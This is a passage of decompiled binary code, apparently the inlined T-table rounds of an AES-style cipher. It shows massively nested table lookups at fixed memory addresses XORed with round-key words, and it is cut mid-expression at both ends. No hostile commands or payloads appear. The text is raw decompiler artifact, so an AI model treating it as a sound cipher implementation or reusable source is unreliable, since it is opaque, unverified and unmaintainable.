((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x18) * 4) ^  *(0x4141c8 + (_t162 & 0x000000ff) * 4) ^ _t257[6];
						_t259 = _t259 - 0x20;
						_t167 =  *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  